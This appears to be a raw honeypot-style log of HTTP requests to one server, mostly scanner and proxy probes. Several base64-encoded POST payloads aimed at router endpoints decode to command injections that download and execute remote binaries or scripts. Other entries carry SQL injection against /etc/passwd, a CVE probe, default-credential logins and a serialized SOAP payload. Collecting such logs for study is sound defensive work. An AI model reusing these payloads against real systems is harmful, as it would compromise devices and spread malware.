"183.136.225.29", "Accept": "*/*", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "149.50.96.22", "Host": "116.202.22.148:80", "User_Agent": "Hello World/1.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "151.245.12.231", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "103.178.228.44", "Host": "www.google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "www.google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.194", "Accept_Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.194", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.194", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.194", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.194", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.27.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36", "Method": "GET", "Path": "/Dockerrun.aws.json", "Http_Version": "HTTP/1.1"} +{"ip": "93.57.18.42", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTt3Z2V0IGh0dHA6Ly8xMDMuNjcuMTk3LjIzMy9tcHNsOyBjaG1vZCA3NzcgbXBzbDsgLi9tcHNsIGxibGluay5zZWxmcmVwOw0KDQo="} +{"ip": "205.210.31.42", "Host": "static.148.22.202.116.clients.your-server.de", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "205.210.31.212", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "116.15.132.195", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTtybSAtcmYgKmFybSo7IHJtIC1yZiAqYXJtNSo7IHJtIC1yZiAqYXJtNio7IHJtIC1yZiAqYXJtNyo7IHJtIC1yZiAqbTY4ayo7IHJtIC1yZiAqbWlwcyo7IHJtIC1yZiAqbXBzbCo7IHJtIC1yZiAqcHBjKjsgcm0gLXJmICpzaDQqOyBybSAtcmYgKnNwYyo7IHJtIC1yZiAqeDg2Kjsgcm0gLXJmICp4ODZfNjQqO3dnZXQgaHR0cDovLzEwMy42Ny4xOTcuODcvc2t5bGpuZS5tcHNsOyBjaG1vZCA3Nzcgc2t5bGpuZS5tcHNsOyAuL3NreWxqbmUubXBzbCBsYmxpbmsuc2VsZnJlcDsNCg0K"} +{"ip": "128.14.239.39", "Accept_Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Host": "116.202.22.148:8080", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "128.14.239.39", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "128.14.239.39", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "128.14.239.39", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "128.14.239.39", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=", "Connection": "keep-alive", "Host": "116.202.22.148:8080", "User_Agent": "python-requests/2.27.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.94.146.57", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.94.146.57", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.94.146.57", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.52", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.79.221.160", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Mozilla/5.0", "Method": "GET", "Path": "/2kTk", "Http_Version": "HTTP/1.1"} +{"ip": "45.79.221.160", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Mozilla/5.0", "Method": "GET", "Path": "/7mXa", "Http_Version": "HTTP/1.1"} +{"ip": "95.214.55.115", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded", "Host": "127.0.0.1:8088", "Origin": "http://127.0.0.1:8088", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "95.214.55.115", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip", "Authorization": "Basic YWRtaW46YWRtaW4=", "Content_Length": "373", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:8080", "Origin": "http://127.0.0.1:8088", "Referer": "http://116.202.22.148:8080/apply.cgi", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Sec-Gpc": "1", "Method": "POST", "Path": "/apply.cgi", "Http_Version": "HTTP/1.1", "POST_Payload": "YWN0aW9uPUFwcGx5VGFrZSZjaGFuZ2VfYWN0aW9uPWdvemlsYV9jZ2kmZGVsX3ZhbHVlPSZob3N0PWh0dHAlM0ElMkYlMkYxMjcuMC4wLjElM0E4MDg4Jm5leHRfcGFnZT1EaWFnbm9zdGljcy5hc3AmcGluZ19pcD1jZCslMkZ0bXAlM0J3Z2V0K2h0dHAlM0ElMkYlMkY0NS44OC45MC4xMTMlMkZzZHhrelhfVVhBMjI5eC5tcHNsKy1PK21mdSUzQmNobW9kKzc3NyttZnUlM0IuJTJGbWZ1K2ZhaXRoJTNCK3JtKy1yZittZnUlM0Ird2dldCtodHRwJTNBJTJGJTJGNDUuODguOTAuMTEzJTJGc2R4a3pYX1VYQTIyOXgubXBzbCstTyttZnUlM0JjaG1vZCs3NzcrbWZ1JTNCLiUyRm1mdSttZW93JTNCJnN1Ym1pdF9idXR0b249UGluZyZzdWJtaXRfdHlwZT1zdGFydA=="} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "159.223.98.198", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "138.68.64.14", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "59.178.10.79", "Content_Length": "0", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.190", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "113.219.218.197", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "69.164.217.74", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "172.104.11.51", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "45.81.39.51", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.247.224.183", "Accept": "*/*", "User_Agent": "masscan/1.3 (https://github.com/robertdavidgraham/masscan)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "95.38.197.68", "Content_Length": "0", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "35.203.211.240", "Host": "116.202.22.148:80", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.52", "Host": "116.202.22.148:8080", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "185.180.143.79", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "107.170.255.4", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/manager/html", "Http_Version": "HTTP/1.1"} +{"ip": "209.141.33.40", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "en", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "Method": "GET", "Path": "/web_shell_cmd.gch", "Http_Version": "HTTP/1.1"} +{"ip": "209.141.33.40", "Host": "[::1]' UNION SELECT '/", "Method": "GET", "Path": "/etc/passwd", "Http_Version": "HTTP/1.1"} +{"ip": "192.241.235.30", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/actuator/health", "Http_Version": "HTTP/1.1"} +{"ip": "46.174.191.32", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "5.32.176.129", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "103.237.87.198", "Host": "www.google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "www.google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "15.237.60.130", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "185.114.175.11", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (compatible; EdgeWatch/1.1; https://about.edgewatch.com/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.91.127.166", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.91.127.166", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "196", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:80", "User_Agent": "Mozila/5.0", "Method": "POST", "Path": "/web_shell_cmd.gch", "Http_Version": "HTTP/1.1", "POST_Payload": "SUZfQUNUSU9OPWFwcGx5JklGX0VSUk9SU1RSPVNVQ0MmSUZfRVJST1JQQVJBTT1TVUNDJklGX0VSUk9SVFlQRT0tMSZDbWQ9Y2QrJTJGdG1wJTNCd2dldCtodHRwJTNBJTJGJTJGaW50ZXJwb2wud3MlMkZmdWV6JTJGcG90YXIuc2glM0JjaG1vZCs3NzcrcG90YXIuc2glM0JzaCtwb3Rhci5zaCt6dGUlM0JybSstcmYrcG90YXIuc2gmQ21kQWNrPQ0KDQo="} +{"ip": "209.141.33.40", "Accept_Encoding": "gzip", "Connection": "close", "Content_Length": "45", "Host": "116.202.22.148", "Origin": "http://116.202.22.148", "Referer": "http://116.202.22.148/webadmin/start/", "User_Agent": "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "Method": "POST", "Path": "/webadmin/auth/verification.php", "Http_Version": "HTTP/1.1", "POST_Payload": "bG9naW49YnJhbmRpbmcmcGFzc3dvcmQ9YnJhbmRpbmcmU3VibWl0PUxvZ2lu"} +{"ip": "209.141.33.40", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "en", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "Method": "GET", "Path": "/webadmin/clientlogin/?srid&action=showdeny&url", "Http_Version": "HTTP/1.1"} +{"ip": "209.141.33.40", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "en", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "Method": "GET", "Path": "/?search==%00{.cookie|Moey9x|value%3dCVE-2014-6287.}", "Http_Version": "HTTP/1.1"} +{"ip": "209.141.33.40", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "en", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "Method": "GET", "Path": "/wlsecurity.html", "Http_Version": "HTTP/1.1"} +{"ip": "209.141.33.40", "Accept_Encoding": "gzip", "Connection": "close", "Content_Length": "7378", "Content_Type": "text/xml; charset=utf-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "SOAPAction": "\"urn:AdminService\"", "Method": "POST", "Path": "/", "Http_Version": "HTTP/1.1", "POST_Payload": "PD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0nVVRGLTgnPz4NCjxTT0FQLUVOVjpFbnZlbG9wZSB4bWxuczpTT0FQLUVOVj0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KPFNPQVAtRU5WOkhlYWRlciBuczA6Sk1YQ29ubmVjdG9yQ29udGV4dD0ick8wQUJYTnlBQTlxWVhaaExuVjBhV3d1VTNSaFkyc1EvaXJDdXdtR0hRSUFBSGh5QUJCcVlYWmhMblYwYVd3dVZtVmpkRzl5MlpkOVc0QTdyd0VEQUFOSkFCRmpZWEJoWTJsMGVVbHVZM0psYldWdWRFa0FER1ZzWlcxbGJuUkRiM1Z1ZEZzQUMyVnNaVzFsYm5SRVlYUmhkQUFUVzB4cVlYWmhMMnhoYm1jdlQySnFaV04wTzNod0FBQUFBQUFBQUFGMWNnQVRXMHhxWVhaaExteGhibWN1VDJKcVpXTjBPNURPV0o4UWN5bHNBZ0FBZUhBQUFBQUtjM0lBT21OdmJTNXBZbTB1ZDNNdWJXRnVZV2RsYldWdWRDNWpiMjV1WldOMGIzSXVTazFZUTI5dWJtVmpkRzl5UTI5dWRHVjRkRVZzWlcxbGJuVGJsUk15WXlGOHNRSUFCVXdBQ0dObGJHeE9ZVzFsZEFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN1RBQUlhRzl6ZEU1aGJXVnhBSDRBQjB3QUNHNXZaR1ZPWVcxbGNRQitBQWRNQUFwelpYSjJaWEpPWVcxbGNRQitBQWRiQUFwemRHRmphMVJ5WVdObGRBQWVXMHhxWVhaaEwyeGhibWN2VTNSaFkydFVjbUZqWlVWc1pXMWxiblE3ZUhCMEFBQjBBQWhNWVhBek9UQXhNM0VBZmdBS2NRQitBQXAxY2dBZVcweHFZWFpoTG14aGJtY3VVM1JoWTJ0VWNtRmpaVVZzWlcxbGJuUTdBa1lxUER6OUlqa0NBQUI0Y0FBQUFDcHpjZ0FiYW1GMllTNXNZVzVuTGxOMFlXTnJWSEpoWTJWRmJHVnRaVzUwWVFuRm1pWTIzWVVDQUFSSkFBcHNhVzVsVG5WdFltVnlUQUFPWkdWamJHRnlhVzVuUTJ4aGMzTnhBSDRBQjB3QUNHWnBiR1ZPWVcxbGNRQitBQWRNQUFwdFpYUm9iMlJPWVcxbGNRQitBQWQ0Y0FBQUFFdDBBRHBqYjIwdWFXSnRMbmR6TG0xaGJtRm5aVzFsYm5RdVkyOXVibVZqZEc5eUxrcE5XRU52Ym01bFkzUnZja052Ym5SbGVIUkZiR1Z0Wlc1MGRBQWZTazFZUTI5dWJtVmpkRzl5UTI5dWRHVjRkRVZzWlcxbGJuUXVhbUYyWVhRQUJqeHBibWwwUG5OeEFINEFEZ0FBQUR4MEFETmpiMjB1YVdKdExuZHpMbTFoYm1GblpXMWxiblF1WTI5dWJtVmpkRzl5TGtwTldFTnZibTVsWTNSdmNrTnZiblJsZUhSMEFCaEtUVmhEYjI1dVpXTjBiM0pEYjI1MFpYaDBMbXBoZG1GMEFBUndkWE5vYzNFQWZnQU9BQUFHUTNRQU9HTnZiUzVwWW0wdWQzTXViV0Z1WVdkbGJXVnVkQzVqYjI1dVpXTjBiM0l1YzI5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA